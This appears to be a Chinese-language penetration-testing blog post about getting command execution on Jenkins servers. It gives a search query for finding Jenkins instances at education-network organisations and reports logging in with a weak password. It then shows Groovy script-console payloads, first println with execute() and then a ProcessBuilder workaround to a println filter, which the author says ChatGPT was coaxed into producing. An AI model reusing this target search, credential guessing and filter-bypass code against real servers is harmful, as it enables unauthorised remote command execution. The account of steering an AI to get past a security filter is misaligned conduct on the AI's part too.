Jenkins - println绕过到shell命令执行
语法
-
org="China Education and Research Network Center" && icon_hash="81586312"
语法说明:两个部分
org
表示筛选的目标为edu
组织
icon_hash
筛选的是图标,特定Jenkins
系列中的某一个图标
Jenkins未授权访问(捡漏失败)
熟悉Jenkins
的应该清楚,若配置不当可直接未授权访问
通常来说该类的标题可以搜索title="Dashboard"
在挖掘的过程中发现很明显的是,这类漏洞交上去逃脱不了重复
的命运
Jenkins捡漏
弱口令
在浏览信息收集的过程中发现如下登录框
浅浅试了一下弱口令,进去了~
脚本执行(println失败)
进入之后我们会来到/script
端点下的命令行,执行groovy script
脚本做到类命令执行的操作
-
Groovy脚本是一种基于Java语法的动态编程语言。它在Java平台上运行,并且与Java语言高度兼容。Groovy提供了许多特性和语法糖,使得编写代码更加简洁和易读。
由于基于Java
语法,因此可以用以下语句测试进行执行验证
-
println "whoami".execute().text
-
在Groovy脚本中,println是用于在控制台输出消息的方法。而execute().text是用于在执行命令时获取命令输出的方式。
案例如下
但是在实际测试过程中输入println
发现直接未响应
,而输入其他的未发生
因此发现了过滤(这边漏洞已修,忘记截图ing)
CHATGPT调教绕过
通过测试清楚了是println
被过滤之后,直接使用CHATGPT
进行漫长的调教
由于是之前进行调教的,这里放出结果,最终找到的替代方法
-
def command = ["whoami"]
-
def process = new ProcessBuilder(command).start()
-
def inputStream = process.getInputStream()
-
def result = new Scanner(inputStream).useDelimiter("\\A").next()
-
print(result)
更多网络安全优质免费学习资料与干货教程加v
送渗透工具、技术文档、书籍,面试题、视频(基础到进阶。环境搭建,HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等)、应急响应笔记、学习路线。
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。